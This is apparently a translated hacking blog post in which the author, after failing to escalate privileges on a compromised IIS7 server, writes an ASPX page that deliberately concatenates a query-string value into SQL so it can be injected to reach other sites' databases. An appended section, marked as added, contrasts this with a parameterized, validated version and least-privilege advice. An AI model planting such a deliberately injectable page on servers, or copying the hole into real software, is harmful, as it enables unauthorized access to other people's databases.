Yesterday 4z1 and I were looking at a site; privilege escalation was really hard, we looked at it for a full 5 hours with no result. 2008 + IIS7, no sa, no root, no services of any kind...
Along the way we used an aspx-constructed injection to go cross-site; found a pile of code online and not one of it worked.
It's not much code, so I just wrote my own. Annoying as hell.
<%@ Page Language="C#" AutoEventWireup="true" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>暗影 aspx constructed-injection page</title>
</head>
<body>
<form id="form1" runat="server">
<div>
<script language="c#" runat="server">

void Page_Init(object sender, EventArgs e)
{
    // The connection string is read from web.config by name; "连接名" is a placeholder for that name
    System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
    conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ConnectionString;
    conn.Open();

    // The parameter comes from the query string: ?xxser=1
    string i = this.Page.Request.Params["xxser"];

    // The value is concatenated straight into the SQL text; that is the injection point this page is built around.
    // "[表]" and "列名" are placeholders for the table and column names.
    System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
    // ExecuteNonQuery runs the statement; for a SELECT it returns -1, so x only shows that the statement ran
    int x = command.ExecuteNonQuery();
    Response.Write(i + "\n");
    Response.Write(x);
    conn.Close();
}

</script>
</div>
</form>
</body>
</html>
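For contrast, here is the same lookup written the way it should be in production: the value is validated and bound as a typed parameter instead of being concatenated into the SQL text, so the string from ?xxser= can never change the shape of the statement. This is an added example and not the poster's code; it is written as a code-behind class rather than an inline script, and the connection-string name "MyDb", the table "MyTable" and the columns "id" and "col" are assumed placeholders.

```csharp
// Added example, not the original poster's code: the lookup from the page above with the
// input validated and passed as a SqlParameter. "MyDb", "MyTable", "id" and "col" are
// placeholders and do not come from the original post.
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Web.UI;

public partial class SafeLookup : Page
{
    protected void Page_Load(object sender, EventArgs e)
    {
        string raw = Request.QueryString["xxser"];

        // Reject anything that is not an integer before it gets near the database.
        int id;
        if (!int.TryParse(raw, out id))
        {
            Response.StatusCode = 400;
            Response.Write("bad id");
            return;
        }

        string cs = ConfigurationManager.ConnectionStrings["MyDb"].ConnectionString;
        using (SqlConnection conn = new SqlConnection(cs))
        using (SqlCommand cmd = new SqlCommand("SELECT col FROM [MyTable] WHERE id = @id", conn))
        {
            // The value travels as a typed parameter; SQL text and data are never mixed.
            cmd.Parameters.Add("@id", SqlDbType.Int).Value = id;
            conn.Open();

            // ExecuteReader actually returns the rows (ExecuteNonQuery would give -1 for a SELECT).
            using (SqlDataReader r = cmd.ExecuteReader())
            {
                int rows = 0;
                while (r.Read())
                {
                    rows++;
                    // Encode on output so a value stored in the table cannot become script in the page.
                    Response.Write(Server.HtmlEncode(Convert.ToString(r["col"])) + "\n");
                }
                Response.Write(rows);
            }
        }
    }
}
```

The parameter does the work here; the TryParse is an extra gate that also gives a clean 400 instead of a SQL error page, which removes the error text that the concatenated version hands back. The account behind the connection string should be a plain database user with rights only on the tables the page needs, not sa, so that even a successful injection elsewhere on the server cannot reach other databases.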